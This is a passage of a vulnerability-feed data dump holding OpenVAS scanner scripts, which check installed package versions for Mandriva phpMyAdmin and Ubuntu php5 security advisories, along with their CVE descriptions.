3.4.3.1 does not\n properly quote regular expressions, which allows remote authenticated\n users to inject a PCRE e (aka PREG_REPLACE_EVAL) modifier, and\n consequently execute arbitrary PHP code, by leveraging the ability\n to modify the SESSION superglobal array (CVE-2011-2507).\n\n Directory traversal vulnerability in libraries/display_tbl.lib.php\n in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1, when\n a certain MIME transformation feature is enabled, allows remote\n authenticated users to include and execute arbitrary local files\n via a .. (dot dot) in a GLOBALS[mime_map][->name][transformation]\n parameter (CVE-2011-2508).\n\n Multiple cross-site scripting (XSS) vulnerabilities in the table Print\n view implementation in tbl_printview.php in phpMyAdmin before 3.3.10.3\n and 3.4.x before 3.4.3.2 allow remote authenticated users to inject\n arbitrary web script or HTML via a crafted table name (CVE-2011-2642).\n\n Directory traversal vulnerability in sql.php in phpMyAdmin 3.4.x before\n 3.4.3.2, when configuration storage is enabled, allows remote attackers\n to include and execute arbitrary local files via directory traversal\n sequences in a MIME-type transformation parameter (CVE-2011-2643).\n\n Multiple directory traversal vulnerabilities in the relational\n schema implementation in phpMyAdmin 3.4.x before 3.4.3.2 allow remote\n authenticated users to include and execute arbitrary local files via\n directory traversal sequences in an export type field, related to\n (1) libraries/schema/User_Schema.class.php and (2) schema_export.php\n (CVE-2011-2718).\n\n libraries/auth/swekey/swekey.auth.lib ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpmyadmin\", rpm:\"phpmyadmin~3.4.3.2~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:55:56", "description": "Check for the Version of phpmyadmin", "cvss3": {}, "published": "2011-08-18T00:00:00", "type": "openvas", "title": "Mandriva Update for phpmyadmin MDVSA-2011:124 (phpmyadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2642", "CVE-2011-2505", "CVE-2011-2718", "CVE-2011-2643", "CVE-2011-2506", "CVE-2011-2719", "CVE-2011-2507"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:831441", "href": "http://plugins.openvas.org/nasl.php?oid=831441", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for phpmyadmin MDVSA-2011:124 (phpmyadmin)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been discovered and corrected in\n phpmyadmin:\n\n libraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication\n feature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1\n assigns values to arbitrary parameters referenced in the query string,\n which allows remote attackers to modify the SESSION superglobal array\n via a crafted request, related to a remote variable manipulation\n vulnerability. (CVE-2011-2505).\n \n setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2\n and 3.4.x before 3.4.3.1 does not properly restrict the presence of\n comment closing delimiters, which allows remote attackers to conduct\n static code injection attacks by leveraging the ability to modify\n the SESSION superglobal array (CVE-2011-2506).\n \n libraries/server_synchronize.lib.php in the Synchronize implementation\n in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not\n properly quote regular expressions, which allows remote authenticated\n users to inject a PCRE e (aka PREG_REPLACE_EVAL) modifier, and\n consequently execute arbitrary PHP code, by leveraging the ability\n to modify the SESSION superglobal array (CVE-2011-2507).\n \n Directory traversal vulnerability in libraries/display_tbl.lib.php\n in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1, when\n a certain MIME transformation feature is enabled, allows remote\n authenticated users to include and execute arbitrary local files\n via a .. (dot dot) in a GLOBALS[mime_map][-&gt;name][transformation]\n parameter (CVE-2011-2508).\n \n Multiple cross-site scripting (XSS) vulnerabilities in the table Print\n view implementation in tbl_printview.php in phpMyAdmin before 3.3.10.3\n and 3.4.x before 3.4.3.2 allow remote authenticated users to inject\n arbitrary web script or HTML via a crafted table name (CVE-2011-2642).\n \n Directory traversal vulnerability in sql.php in phpMyAdmin 3.4.x before\n 3.4.3.2, when configuration storage is enabled, allows remote attackers\n to include and execute arbitrary local files via directory traversal\n sequences in a MIME-type transformation parameter (CVE-2011-2643).\n \n Multiple directory traversal vulnerabilities in the relational\n schema implementation in phpMyAdmin 3.4.x before 3.4.3.2 allow remote\n authenticated users to include and execute arbitrary local files via\n directory traversal sequences in an export type field, related to\n (1) libraries/schema/User_Schema.class.php and (2) schema_export.php\n (CVE-2011-2718).\n \n libraries/auth/swekey/swekey.auth.lib ... \n\n Description truncated, for more information please check the Reference URL\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpmyadmin on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-08/msg00006.php\");\n script_id(831441);\n script_version(\"$Revision: 6565 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 14:56:06 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-18 14:57:45 +0200 (Thu, 18 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2011:124\");\n script_cve_id(\"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\", \"CVE-2011-2642\", \"CVE-2011-2643\", \"CVE-2011-2718\", \"CVE-2011-2719\");\n script_name(\"Mandriva Update for phpmyadmin MDVSA-2011:124 (phpmyadmin)\");\n\n script_summary(\"Check for the Version of phpmyadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpmyadmin\", rpm:\"phpmyadmin~3.4.3.2~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-23T13:05:21", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-989-1", "cvss3": {}, "published": "2010-09-22T00:00:00", "type": "openvas", "title": "Ubuntu Update for php5 vulnerabilities USN-989-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1129", "CVE-2010-2225", "CVE-2010-1868", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-1866", "CVE-2010-2094", "CVE-2010-1130", "CVE-2010-2950", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2018-01-23T00:00:00", "id": "OPENVAS:1361412562310840501", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840501", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_989_1.nasl 8495 2018-01-23 07:57:49Z teissa $\n#\n# Ubuntu Update for php5 vulnerabilities USN-989-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Auke van Slooten discovered that PHP incorrectly handled certain xmlrpc\n requests. An attacker could exploit this issue to cause the PHP server to\n crash, resulting in a denial of service. This issue only affected Ubuntu\n 6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-0397)\n\n It was discovered that the pseudorandom number generator in PHP did not\n provide the expected entropy. An attacker could exploit this issue to\n predict values that were intended to be random, such as session cookies.\n This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10.\n (CVE-2010-1128)\n \n It was discovered that PHP did not properly handle directory pathnames that\n lacked a trailing slash character. An attacker could exploit this issue to\n bypass safe_mode restrictions. This issue only affected Ubuntu 6.06 LTS,\n 8.04 LTS, 9.04 and 9.10. (CVE-2010-1129)\n \n Grzegorz Stachowiak discovered that the PHP session extension did not\n properly handle semicolon characters. An attacker could exploit this issue\n to bypass safe_mode restrictions. This issue only affected Ubuntu 8.04 LTS,\n 9.04 and 9.10. (CVE-2010-1130)\n \n Stefan Esser discovered that PHP incorrectly decoded remote HTTP chunked\n encoding streams. An attacker could exploit this issue to cause the PHP\n server to crash and possibly execute arbitrary code with application\n privileges. This issue only affected Ubuntu 10.04 LTS. (CVE-2010-1866)\n \n Mateusz Kocielski discovered that certain PHP SQLite functions incorrectly\n handled empty SQL queries. An attacker could exploit this issue to possibly\n execute arbitrary code with application privileges. (CVE-2010-1868)\n \n Mateusz Kocielski discovered that PHP incorrectly handled certain arguments\n to the fnmatch function. An attacker could exploit this flaw and cause the\n PHP server to consume all available stack memory, resulting in a denial of\n service. (CVE-2010-1917)\n \n Stefan Esser discovered that PHP incorrectly handled certain strings in the\n phar extension. An attacker could exploit this flaw to possibly view\n sensitive information. This issue only affected Ubuntu 10.04 LTS.\n (CVE-2010-2094, CVE-2010-2950)\n \n Stefan Esser discovered that PHP incorrectly handled deserialization of\n SPLObjectStorage objects. A remote attacker could exploit this issue to\n view sensitive information and possibly execute arbitrary code with\n application privileges. This issue only affected Ubuntu 8.04 LTS, 9.04,\n 9.10 and 10.04 LTS. (CVE-2010-2225)\n \n It was discovered that PHP incorrectly filtered ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-989-1\";\ntag_affected = \"php5 vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.04 ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-989-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840501\");\n script_version(\"$Revision: 8495 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 08:57:49 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-22 08:32:53 +0200 (Wed, 22 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"USN\", value: \"989-1\");\n script_cve_id(\"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1129\", \"CVE-2010-1130\", \"CVE-2010-1866\", \"CVE-2010-1868\", \"CVE-2010-1917\", \"CVE-2010-2094\", \"CVE-2010-2225\", \"CVE-2010-2531\", \"CVE-2010-2950\", \"CVE-2010-3065\");\n script_name(\"Ubuntu Update for php5 vulnerabilities USN-989-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysqli\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", 